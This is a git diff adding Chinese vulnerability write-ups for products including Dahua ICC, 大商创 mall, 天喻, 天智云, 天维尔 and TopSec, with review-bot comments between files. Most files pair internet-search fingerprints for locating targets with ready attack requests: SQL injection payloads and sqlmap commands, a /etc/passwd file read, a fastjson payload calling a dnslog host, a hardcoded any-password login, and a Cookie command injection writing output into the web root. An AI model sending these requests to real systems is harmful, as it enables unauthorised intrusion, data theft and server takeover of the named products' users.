+title="智能云网关注册管理平台" +``` + +## poc + +```javascript +POST /index.php/User/doLogin HTTP/1.1 +Host: +Accept: */* +Accept-Encoding: gzip, deflate +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 +X-Requested-With: XMLHttpRequest +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + +username=1')and+updatexml(1,concat(0x7e,user(),0x7e),1)--+&password= +``` + +![image-20241017143354676](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410171433754.png) \ No newline at end of file 
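Review bot: in the 密码泄露 record, `采用MD5加密` is wrong terminology: MD5 is an unsalted hash, not encryption, and the distinction matters for impact, since the exposure of the `system` account's hash through an unauthenticated `/admin/user_getUserInfoByUserName.action` is the finding and the fix is access control on the admin actions (plus salted password hashing). The sentence `可通过遍历userName参数` ends in a dangling comma and should be completed or cut. The CNVD-2024-38747 file fences its FOFA query and HTTP request as ```javascript, leaves `Host:` empty without marking it, and, although it has a CNVD identifier, cites no advisory link or affected version; the CNVD entry is the natural reference to add.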
diff --git a/大华智能物联综合管理平台(ICC)info存在信息泄露.md b/大华智能物联综合管理平台(ICC)info存在信息泄露.md new file mode 100644 index 0000000..c4e4406 --- /dev/null +++ b/大华智能物联综合管理平台(ICC)info存在信息泄露.md @@ -0,0 +1,31 @@ +# 大华智能物联综合管理平台(ICC)info存在信息泄露 + +# 一、漏洞简介 +浙江大华技术股份有限公司,是全球领先的以视频为核心的智慧物联解决方案提供商和运营服务商,大华智能物联综合管理平台(ICC)info存在信息泄露。 + +# 二、影响版本 ++ 大华智能物联综合管理平台(ICC) + +# 三、资产测绘 ++ hunter`web.body="*客户端会小于800*"` ++ 特征 + +![1698336070869-d2bec4ae-041a-43a9-981b-f3b9dad9c004.png](./img/8KAhtAW0SvGpY8Rt/1698336070869-d2bec4ae-041a-43a9-981b-f3b9dad9c004-364557.png) + +# 四、漏洞复现 +```plain +GET /evo-apigw/evo-visitor/1.0.0/card/visitor/user/info?userId=4&pageNum=1&pageSize=1000 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Upgrade-Insecure-Requests: 1 +``` + +![1716001623502-df87343a-998c-4522-b992-0490c28a22c5.png](./img/8KAhtAW0SvGpY8Rt/1716001623502-df87343a-998c-4522-b992-0490c28a22c5-537803.png) + + + +> 更新: 2024-05-18 12:31:26 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qiwf6qcxedf9t1ir> \ No newline at end of file diff --git a/大华智能物联综合管理平台(ICC)page存在信息泄露.md b/大华智能物联综合管理平台(ICC)page存在信息泄露.md new file mode 100644 index 0000000..85dc8f0 --- /dev/null +++ b/大华智能物联综合管理平台(ICC)page存在信息泄露.md 
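Review bot: the summary says only `info存在信息泄露` and does not say what data the endpoint returns; from the path (`/evo-apigw/evo-visitor/1.0.0/card/visitor/user/info` with `pageNum`/`pageSize`) it is paged visitor records, and the record should say so, because the data class determines the severity and any disclosure obligations. State whether the request was sent without a session (no `Cookie` is shown, which suggests an unauthenticated gateway route) and mark the empty `Host:` as a placeholder. No affected version or vendor reference is given.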
@@ -0,0 +1,25 @@ +# 大华智能物联综合管理平台(ICC)page存在信息泄露 + +# 一、漏洞简介 +浙江大华技术股份有限公司,是全球领先的以视频为核心的智慧物联解决方案提供商和运营服务商,大华智能物联综合管理平台(ICC)page存在信息泄露。 + +# 二、影响版本 ++ 大华智能物联综合管理平台(ICC) + +# 三、资产测绘 ++ hunter`web.body="*客户端会小于800*"` ++ 特征 + +![1698336070869-d2bec4ae-041a-43a9-981b-f3b9dad9c004.png](./img/yk3Nv7TC8vo6v7Lu/1698336070869-d2bec4ae-041a-43a9-981b-f3b9dad9c004-151161.png) + +# 四、漏洞复现 +```plain +/evo-apigw/evo-face/personInfo/page?pageSize=10 +``` + +![1700140396421-a6bee011-dc48-4d41-876b-a7f0f649c78e.png](./img/yk3Nv7TC8vo6v7Lu/1700140396421-a6bee011-dc48-4d41-876b-a7f0f649c78e-456265.png) + + + +> 更新: 2024-02-29 23:57:19 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rnq80hcwo0wrk26s> \ No newline at end of file diff --git a/大华智能物联综合管理平台(ICC)randomfastjson远程命令执行.md b/大华智能物联综合管理平台(ICC)randomfastjson远程命令执行.md new file mode 100644 index 0000000..2a382b4 --- /dev/null +++ b/大华智能物联综合管理平台(ICC)randomfastjson远程命令执行.md 
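Review bot: the 四、漏洞复现 section is a bare path, `/evo-apigw/evo-face/personInfo/page?pageSize=10`, with no method, no indication of whether a session is needed, and a screenshot as the only evidence; the sibling info record at least shows the full request. Add the method and the auth state, and name the data class: a `personInfo` page endpoint returns personal identity data, which is the fact an asset owner needs for impact assessment. The summary again just repeats the title.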
@@ -0,0 +1,41 @@ +# 大华智能物联综合管理平台(ICC)random fastjson远程命令执行 + +# 一、漏洞简介 +浙江大华技术股份有限公司,是全球领先的以视频为核心的智慧物联解决方案提供商和运营服务商,大华智能物联综合管理平台random 存在fastjson远程命令执行,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ 大华智能物联综合管理平台(ICC) + +# 三、资产测绘 ++ hunter`web.body="*客户端会小于800*"` ++ 特征 + +![1698336070869-d2bec4ae-041a-43a9-981b-f3b9dad9c004.png](./img/BtmXKCbbYKEhwLpy/1698336070869-d2bec4ae-041a-43a9-981b-f3b9dad9c004-210040.png) + +# 四、漏洞复现 +poc:前往dnslog获取一个地址替换下列poc中的地址发起请求 + +```plain +POST /evo-runs/v1.0/auths/sysusers/random HTTP/2 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) +Connection: close +Content-Length: 372 +Content-Type: application/json;charset=utf-8 +Accept-Encoding: gzip, deflate + +{"a":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.net.URL","val":"http://spjm2r.dnslog.cn"}}""},"b":{{"@type":"java.net.URL","val":"http://spjm2r.dnslog.cn"}:"x"},"c":{{"@type":"java.net.URL","val":"http://spjm2r.dnslog.cn"}:0,"d":Set[{"@type":"java.net.URL","val":"http://spjm2r.dnslog.cn"}],"e":Set[{"@type":"java.net.URL","val":"http://spjm2r.dnslog.cn"},} +``` + +![1700141693694-e294200a-f4f8-40f7-a26b-f050d75799ec.png](./img/BtmXKCbbYKEhwLpy/1700141693694-e294200a-f4f8-40f7-a26b-f050d75799ec-068880.png) + +dns收到响应 + +![1700141711840-a6f53e9e-6c4e-4e80-aad4-1919aa709b30.png](./img/BtmXKCbbYKEhwLpy/1700141711840-a6f53e9e-6c4e-4e80-aad4-1919aa709b30-104216.png) + + + + + +> 更新: 2024-02-29 23:57:19 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ggsmd59d5g6pzrnd> \ No newline at end of file diff --git a/大华智能物联综合管理平台(ICC)存在任意文件读取漏洞.md b/大华智能物联综合管理平台(ICC)存在任意文件读取漏洞.md new file mode 100644 index 0000000..8f75e27 --- /dev/null +++ b/大华智能物联综合管理平台(ICC)存在任意文件读取漏洞.md 
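Review bot: the request line reads `POST /evo-runs/v1.0/auths/sysusers/random HTTP/2` while every other record in the commit is a raw HTTP/1.1 request; an HTTP/2 request cannot be written in this textual form, so either the version is a capture artefact or the block should be labelled as a tool export. The JSON body is deliberately not well-formed (unbalanced braces, `Set[...]`); say so in the text, otherwise a later editor will "fix" the syntax and change the record. `http://spjm2r.dnslog.cn` appears five times and should be one placeholder, consistent with the prose instruction to substitute a dnslog address. The title claims 远程命令执行 but the evidence shown is only the DNS callback from fastjson's `java.net.URL` handling; classify it as fastjson unsafe deserialization with a callback, with the affected fastjson version if known.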
@@ -0,0 +1,25 @@ +# 大华智能物联综合管理平台(ICC)存在任意文件读取漏洞 + +# 一、漏洞简介 +浙江大华技术股份有限公司,是全球领先的以视频为核心的智慧物联解决方案提供商和运营服务商,大华智能物联综合管理平台(ICC)存在任意文件读取漏洞。 + +# 二、影响版本 ++ 大华智能物联综合管理平台(ICC) + +# 三、资产测绘 ++ hunter`web.body="*客户端会小于800*"` ++ 特征 + +![1698336070869-d2bec4ae-041a-43a9-981b-f3b9dad9c004.png](./img/baFCS1-k5qnJaLlX/1698336070869-d2bec4ae-041a-43a9-981b-f3b9dad9c004-063468.png) + +# 四、漏洞复现 +```plain +/evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd +``` + +![1698767562703-2a52b16a-1317-44d7-8bb9-531c2f8dfe2f.png](./img/baFCS1-k5qnJaLlX/1698767562703-2a52b16a-1317-44d7-8bb9-531c2f8dfe2f-099139.png) + + + +> 更新: 2024-02-29 23:57:19 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/dh0fr3iwsw1u74kk> \ No newline at end of file diff --git a/大华智能物联综合管理平台(ICC)存在逻辑漏洞.md b/大华智能物联综合管理平台(ICC)存在逻辑漏洞.md new file mode 100644 index 0000000..605ea00 --- /dev/null +++ b/大华智能物联综合管理平台(ICC)存在逻辑漏洞.md @@ -0,0 +1,33 @@ +# 大华智能物联综合管理平台(ICC)存在逻辑漏洞 + +# 一、漏洞简介 +浙江大华技术股份有限公司,是全球领先的以视频为核心的智慧物联解决方案提供商和运营服务商,大华智能物联综合管理平台(ICC)存在逻辑漏洞,可登陆应用后台。 + +# 二、影响版本 ++ 大华智能物联综合管理平台(ICC) + +# 三、资产测绘 ++ hunter`web.body="*客户端会小于800*"` ++ 特征 + +![1698336070869-d2bec4ae-041a-43a9-981b-f3b9dad9c004.png](./img/7yaQI2AUPtTcYV-V/1698336070869-d2bec4ae-041a-43a9-981b-f3b9dad9c004-409869.png) + +# 四、漏洞复现 +api信息泄露 + +```java +/api +``` + +![1698336313178-f8761ff1-b3af-4327-bf1a-a7b0d9a06aa2.png](./img/7yaQI2AUPtTcYV-V/1698336313178-f8761ff1-b3af-4327-bf1a-a7b0d9a06aa2-537818.png) + +任意密码登陆 + +<font style="color:rgb(51,51,51);">直接输入账户</font>`<font style="color:rgb(51,51,51);">justForTest</font>`<font style="color:rgb(51,51,51);">,密码任意输入,直接进入后台。界面如下</font> + +![1698336392454-6bf25ac0-92a2-47c5-99a4-5dfaf5c4cd87.png](./img/7yaQI2AUPtTcYV-V/1698336392454-6bf25ac0-92a2-47c5-99a4-5dfaf5c4cd87-832347.png) + + + +> 更新: 2024-02-29 23:57:19 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gos4ilum1dcbrzp3> \ No newline at end of file 
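Review bot: In `大华智能物联综合管理平台(ICC)存在逻辑漏洞.md` the 任意密码登陆 paragraph carries yuque export markup, `<font style="color:rgb(51,51,51);">...</font>`, including inside the backtick span around `justForTest`, so the account name renders as literal HTML; strip the tags. The finding is a hardcoded test account that accepts any password, which is the defender-relevant classification and should replace the vague `存在逻辑漏洞` in the 简介, and the `/api` block is fenced with a `java` tag although it is a URL path. In the sibling `大华智能物联综合管理平台(ICC)存在任意文件读取漏洞.md` the path `readPic?fileUrl=file:/etc/passwd` is given without saying whether authentication is required; severity depends on that and the text should state it.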
diff --git a/大商创多用户商城wholesale_flow.php存在SQL注入漏洞.md b/大商创多用户商城wholesale_flow.php存在SQL注入漏洞.md new file mode 100644 index 0000000..a004146 --- /dev/null +++ b/大商创多用户商城wholesale_flow.php存在SQL注入漏洞.md @@ -0,0 +1,26 @@ +# 大商创多用户商城wholesale_flow.php存在SQL注入漏洞 + +大商创多用户商城系统 wholesale_flow.php接口处存在SQL注入漏洞,未经身份验证攻击者可通过输入恶意 SQL 代码,突破系统原本设定的访问规则,未经授权访问、修改或删除数据库中的各类敏感信息,包括但不限于员工个人资料、企业核心业务数据等。进一步利用可获取服务器权限。 + +## fofa + +``` +body="dsc-choie" +``` + +## poc + +```javascript +POST /wholesale_flow.php?step=ajax_update_cart HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Connection: close + +rec_ids[]=extractvalue(1,concat(0x7e,version())) +``` + +![image-20241019201036088](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410251431588.png) + + + diff --git a/大商创多用户商城系统ajax_dialog.php存在SQL注入漏洞.md b/大商创多用户商城系统ajax_dialog.php存在SQL注入漏洞.md new file mode 100644 index 0000000..26476a8 --- /dev/null +++ b/大商创多用户商城系统ajax_dialog.php存在SQL注入漏洞.md 
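Review bot: `大商创多用户商城wholesale_flow.php存在SQL注入漏洞.md` uses a different layout (`## fofa` / `## poc`, no 影响版本 or 资产测绘 headings) from the numbered 一/二/三/四 sections used by most files in this commit; pick one layout so the repository can be parsed consistently. The raw request is fenced with a `javascript` tag, and the 简介 is generic boilerplate (`包括但不限于员工个人资料、企业核心业务数据等`) that never names the injection point; the one concrete fact in the hunk, that the `rec_ids[]` array parameter of `step=ajax_update_cart` is injectable without authentication, belongs in the 简介.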
@@ -0,0 +1,23 @@ +# 大商创多用户商城系统ajax_dialog.php存在SQL注入漏洞 + +大商创多用户商城系统 ajax_dialog.php接口处存在SQL注入漏洞,未经身份验证攻击者可通过输入恶意 SQL 代码,突破系统原本设定的访问规则,未经授权访问、修改或删除数据库中的各类敏感信息,包括但不限于员工个人资料、企业核心业务数据等。进一步利用可获取服务器权限。 + +## fofa + +```javascript +body="dsc-choie" +``` + +## poc + +```javascript +GETT /ajax_dialog.php?_=1600309513833&act=getUserInfo&brand_id=extractvalue(1,concat(0x7e,md5(123)))&is_jsonp=1&jsoncallback=jQuery19106489774159975068_1600309513832&seckillid=null&temp=backup_tpl_1 HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +``` + +![image-20241019194229784](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410251434207.png) diff --git a/天喻软件数据安全平台Setmng.ashx存在SQL注入漏洞.md b/天喻软件数据安全平台Setmng.ashx存在SQL注入漏洞.md new file mode 100644 index 0000000..86e7a1f --- /dev/null +++ b/天喻软件数据安全平台Setmng.ashx存在SQL注入漏洞.md 
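Review bot: The request line in the poc block of `大商创多用户商城系统ajax_dialog.php存在SQL注入漏洞.md` reads `GETT /ajax_dialog.php?...`, which is not an HTTP method; this is a typo for `GET`. Both fenced blocks (the fofa query and the raw request) are tagged `javascript`, which they are not. The 简介 is copied word for word from the wholesale_flow.php file with only the script name changed, so it does not say which parameter is injectable; the request shows it is `brand_id` under `act=getUserInfo`, and that should be stated in text.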
@@ -0,0 +1,49 @@ +# 天喻软件数据安全平台 Setmng.ashx 存在SQL注入漏洞 + +# 一、漏洞简介 +武汉天喻软件有限公司是依托国家企业信息化应用支撑软件工程技术研究中心成立的专业数字化设计软件提供商,武汉天喻软件有限公司天喻软件数据安全平台 Setmng.ashx 存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。 + +# 二、影响版本 ++ 天喻软件数据安全平台 + +# 三、资产测绘 ++ hunter`web.body="数据安全"&&web.body="天喻"` ++ 特征 + +![1702278921868-ed8c54f2-4af4-4217-a84e-a6b0effd021b.png](./img/NArvknPrBwITK6HP/1702278921868-ed8c54f2-4af4-4217-a84e-a6b0effd021b-609325.png) + +# 四、漏洞复现 +```plain +GET /p_handler/Setmng.ashx?operatetype=getparamvalue¶mname=1%27%2b(SELECT%20CHAR(90)%2bCHAR(103)%2bCHAR(103)%2bCHAR(71)%20WHERE%205505=5505%20AND%206796%20IN%20(SELECT%20(CHAR(113)%2bCHAR(98)%2bCHAR(112)%2bCHAR(118)%2bCHAR(113)%2b(SELECT%20(CASE%20WHEN%20(6796=6796)%20THEN%20CHAR(49)%20ELSE%20CHAR(48)%20END))%2bCHAR(113)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(113))))%2b%27 HTTP/1.1 +Host: {hostname} +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: ASP.NET_SessionId=ubyt433ue142lpuddbnjsybm +Upgrade-Insecure-Requests: 1 +``` + +![1702279064168-29353ede-f5fc-436b-b54d-d05437eabfcd.png](./img/NArvknPrBwITK6HP/1702279064168-29353ede-f5fc-436b-b54d-d05437eabfcd-986150.png) + +sqlmap + +```plain +GET /p_handler/Setmng.ashx?operatetype=getparamvalue¶mname=1 HTTP/1.1 +Host: {hostname} +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: ASP.NET_SessionId=ubyt433ue142lpuddbnjsybm +Upgrade-Insecure-Requests: 1 +``` + 
+![1702279315862-2a9e2004-44ef-4e0c-a7f2-28f741e9a1a1.png](./img/NArvknPrBwITK6HP/1702279315862-2a9e2004-44ef-4e0c-a7f2-28f741e9a1a1-694535.png) + + + +> 更新: 2024-02-29 23:55:43 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/eapt0rguixag6qgu> \ No newline at end of file diff --git a/天喻软件数据安全平台存在目录遍历漏洞.md b/天喻软件数据安全平台存在目录遍历漏洞.md new file mode 100644 index 0000000..091ee44 --- /dev/null +++ b/天喻软件数据安全平台存在目录遍历漏洞.md @@ -0,0 +1,25 @@ +# 天喻软件数据安全平台存在目录遍历漏洞 + +# 一、漏洞简介 +武汉天喻软件有限公司是依托国家企业信息化应用支撑软件工程技术研究中心成立的专业数字化设计软件提供商,武汉天喻软件有限公司天喻软件数据安全平台存在目录遍历漏洞。 + +# 二、影响版本 ++ 天喻软件数据安全平台 + +# 三、资产测绘 ++ hunter`web.body="数据安全"&&web.body="天喻"` ++ 特征 + +![1702278921868-ed8c54f2-4af4-4217-a84e-a6b0effd021b.png](./img/oHYPldLmxAltIV5C/1702278921868-ed8c54f2-4af4-4217-a84e-a6b0effd021b-361026.png) + +# 四、漏洞复现 +```plain +/handler/ +``` + +![1702278947680-75ca45e8-f846-49dd-9943-d5ce81608292.png](./img/oHYPldLmxAltIV5C/1702278947680-75ca45e8-f846-49dd-9943-d5ce81608292-882605.png) + + + +> 更新: 2024-02-29 23:55:43 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/riz4bqs00cgq4ybr> \ No newline at end of file diff --git a/天智云制造管理平台存在SQL注入漏洞.md b/天智云制造管理平台存在SQL注入漏洞.md new file mode 100644 index 0000000..98bf6fb --- /dev/null +++ b/天智云制造管理平台存在SQL注入漏洞.md 
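Review bot: In both request blocks of `天喻软件数据安全平台Setmng.ashx存在SQL注入漏洞.md` the query string reads `operatetype=getparamvalue¶mname=1...`: the `&para` of `&paramname` has been decoded to the pilcrow `¶` (HTML entity `&para;`), so the second parameter name is lost and the text never names it; restore `&paramname` and name it in the 简介. Both requests also carry a captured `Cookie: ASP.NET_SessionId=ubyt433ue142lpuddbnjsybm`; state whether `/p_handler/Setmng.ashx` is reachable without a session, because pre-auth versus post-auth decides the severity, and drop the cookie if it is not needed. In `天喻软件数据安全平台存在目录遍历漏洞.md` the finding is a directory listing of `/handler/`, not path traversal; `目录遍历` is used for both in Chinese, so the 简介 should say explicitly that it is a directory listing.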
@@ -0,0 +1,42 @@ +# 天智云制造管理平台存在SQL注入漏洞 + +# 一、漏洞简介 +天智(苏州)智能系统有限公司天智云制造管理平台是一款专注于中小企业智能化生产管理的SaaS软件。该平台通过一站式服务串联销售、采购、生产、质量和仓库等部门,实现生产全过程的数字化管理。它具备生产管理、订单管理、质量追溯、仓库管理等多项功能,并通过移动化、可配置的方式,满足企业个性化需求。天智云制造管理平台致力于提高生产效率、降低生产成本、提升产品质量,帮助中小企业实现数智化转型。天智云制造管理平台是一款专注于中小企业智能化生产管理的SaaS软件。该系统 Usermanager.ashx 存在sql注入漏洞,攻击者可获取数据库敏感信息。 + +# 二、影响版本 ++ 天智云制造管理平台 + +![1717521987496-0cdc1e1a-6218-4a69-8710-5d4c3ab7bfcf.png](./img/cqxqW9CfhZvLaZfD/1717521987496-0cdc1e1a-6218-4a69-8710-5d4c3ab7bfcf-233161.png) + +# 三、资产测绘 +```plain +body="Ashx/Usermanager.ashx" +``` + +# 四、漏洞复现 +```rust +POST /Ashx/Usermanager.ashx HTTP/1.1 +Host: +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 + +type=LOGIN&username=1') AND 1566=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(90)||CHR(98)||CHR(107),5) AND ('DgMy'='DgMy&pwd=123&vendor= +``` + +![1717522389390-1984a2fc-6c71-4bd0-9e4f-f2ba802d3ba5.png](./img/cqxqW9CfhZvLaZfD/1717522389390-1984a2fc-6c71-4bd0-9e4f-f2ba802d3ba5-947512.png) + +```rust +POST /Ashx/Usermanager.ashx HTTP/1.1 +Host: +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 + +type=LOGIN&username=1&pwd=123&vendor= +``` + +![1717522241787-c3080d0a-5cf1-4e32-ae54-72fe6ce28e3b.png](./img/cqxqW9CfhZvLaZfD/1717522241787-c3080d0a-5cf1-4e32-ae54-72fe6ce28e3b-241140.png) + + + +> 更新: 2024-06-11 10:35:37 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/suc76y4muoeqbtkp> \ No newline at end of file diff --git a/天维尔消防智能指挥平台API接口页面sql注入.md b/天维尔消防智能指挥平台API接口页面sql注入.md new file mode 100644 index 0000000..b2b06cf --- /dev/null +++ b/天维尔消防智能指挥平台API接口页面sql注入.md 
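Review bot: Both request blocks in `天智云制造管理平台存在SQL注入漏洞.md` are fenced with a `rust` tag, which is wrong for raw HTTP and will highlight garbage; use `plain`. The second block (`type=LOGIN&username=1&pwd=123&vendor=`) is never explained; say that it is the baseline request whose response time is compared with the first, where `DBMS_PIPE.RECEIVE_MESSAGE(...,5)` is expected to add about five seconds, since a time-based check is meaningless without the control. The 简介 repeats the sentence `天智云制造管理平台是一款专注于中小企业智能化生产管理的SaaS软件` twice, and the `Host:` header is left empty in both requests.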
@@ -0,0 +1,42 @@ +# 天维尔消防智能指挥平台API接口页面sql注入 + +# 一、漏洞简介 +<font style="color:rgba(0, 0, 0, 0.9);">天维尔消防智能指挥平台是一个采用先进的信息技术和通信技术的系统,能够快速准确地获取和处理突发事件的信息,实现对灾害现场的实时监控和指挥调度,有效提升应急救援工作的能力和水平。天为消防智能指挥平台存在一个漏洞,影响组件API接口中/mfsNotice/page文件的未知代码。通过操纵参数gsdwid可以导致SQL注入</font> + +# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font> ++ 天维尔消防智能指挥平台 + +# 三、资产测绘 ++ fofa`body="1997-2020 天维尔信息科技股份有限公司"` ++ 特征![1713248867816-c5d8010e-070f-4e92-8138-7526aa05d8fc.png](./img/bLXwGvRixXSMcwTn/1713248867816-c5d8010e-070f-4e92-8138-7526aa05d8fc-610098.png) + +# 四、漏洞复现 +```java +POST /twms-service-mfs/mfsNotice/page HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: application/json +Content-Length: 103 + +{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930')AND 5803=(SELECT 5803 FROM PG_SLEEP(3)) AND ('oJoi'='oJoi"},"hgubmt748n4":"="} +``` + +![1713248959286-64b5a565-ee51-45ab-8b52-05b56045b8a8.png](./img/bLXwGvRixXSMcwTn/1713248959286-64b5a565-ee51-45ab-8b52-05b56045b8a8-568512.png) + +SQLMAP命令 + +```java +python3 sqlmap.py -r payload.txt --technique=T --time-sec 3 --dbs -v 3 --level 5 --random-agent +``` + +![1713251141032-131b90b2-330d-44bc-9445-51c55778e1e8.png](./img/bLXwGvRixXSMcwTn/1713251141032-131b90b2-330d-44bc-9445-51c55778e1e8-306551.png) + + + +> 更新: 2024-04-20 22:02:56 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ch6s7681pfvp2rws> \ No newline at end of file diff --git a/天融信TOPSECCookie远程命令执行漏洞.md b/天融信TOPSECCookie远程命令执行漏洞.md new file mode 100644 index 0000000..8f903a6 --- /dev/null +++ b/天融信TOPSECCookie远程命令执行漏洞.md 
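Review bot: `天维尔消防智能指挥平台API接口页面sql注入.md` carries yuque `<font style="color:rgba(0, 0, 0, 0.9);">` markup around the 简介 and inside the `# 二、影响版本` heading, so the heading renders with literal HTML; strip it. The 简介 misspells the vendor as `天为消防` (the title and the fofa query say `天维尔`), the `特征` bullet has the screenshot glued onto the same line, and the sqlmap command refers to `payload.txt`, which is not in the commit; state that it is the request above saved to a file, or commit it. The `java` fence tag is wrong for both the raw request and the shell command.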
@@ -0,0 +1,40 @@ +# 天融信TOPSEC Cookie 远程命令执行漏洞 + +# 一、漏洞简介 +<font style="color:rgb(77, 77, 77);">天融信TopSec安全管理系统 Cookie字段存在远程命令执行漏洞,通过该漏洞,攻击者可通过构造恶意字符串,执行任意系统命令,从而拿下服务器权限。</font> + +# <font style="color:rgb(77, 77, 77);">二、影响版本</font> ++ <font style="color:rgb(77, 77, 77);">天融信TopSec安全管理系统</font> + +# <font style="color:rgb(77, 77, 77);">三、资产测绘</font> ++ hunter`web.body="/cgi/maincgi.cgi?Url=VerifyCode"` ++ 特征 + +![1704936146537-13a86149-a1db-456a-823d-3aa12caf6762.png](./img/AgIFV74hdffAwtGZ/1704936146537-13a86149-a1db-456a-823d-3aa12caf6762-191707.png) + +# 四、漏洞复现 +```java +GET /cgi/maincgi.cgi?Url=aa HTTP/1.1 +Host: +Cookie: session_id_443=1|echo `id` > /www/htdocs/site/image/tt.txt; +User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 +``` + +![1704936207084-191ac2c5-9555-4105-a03f-68bc8b2847a8.png](./img/AgIFV74hdffAwtGZ/1704936207084-191ac2c5-9555-4105-a03f-68bc8b2847a8-085309.png) + +获取命令执行结果 + +```java +GET /site/image/tt.txt HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 +``` + +![1704936274463-eaacc85c-3862-4293-8deb-290be80ec4b8.png](./img/AgIFV74hdffAwtGZ/1704936274463-eaacc85c-3862-4293-8deb-290be80ec4b8-523088.png) + +[test_qrcode_b-rce.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222234675-5ae23a8d-103c-4fab-bc8f-c12a5b7ca4fe.yaml) + + + +> 更新: 2024-02-29 23:57:14 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ff91c9eyvw89wgfb> \ No newline at end of file diff --git a/天融信上网行为管理系统存在默认账号密码.md b/天融信上网行为管理系统存在默认账号密码.md new file mode 100644 index 0000000..453fe27 --- /dev/null +++ b/天融信上网行为管理系统存在默认账号密码.md 
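Review bot: The PoC in `天融信TOPSECCookie远程命令执行漏洞.md` writes command output into the web root (`Cookie: session_id_443=1|echo `id` > /www/htdocs/site/image/tt.txt;`) and the second request fetches `/site/image/tt.txt`; the write-up should say that this leaves an artifact on disk that administrators can check for, and that the access-log indicator is a `session_id_443` cookie value containing a shell pipe, since the 简介 names neither. The nuclei template `test_qrcode_b-rce.yaml` is only linked as a yuque attachment URL that will not survive outside that site; commit the file instead. The `<font style="color:rgb(77, 77, 77);">` tags in the 简介 and in the `二、影响版本` and `三、资产测绘` headings should be stripped, and the `java` fence tag is wrong for raw HTTP.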
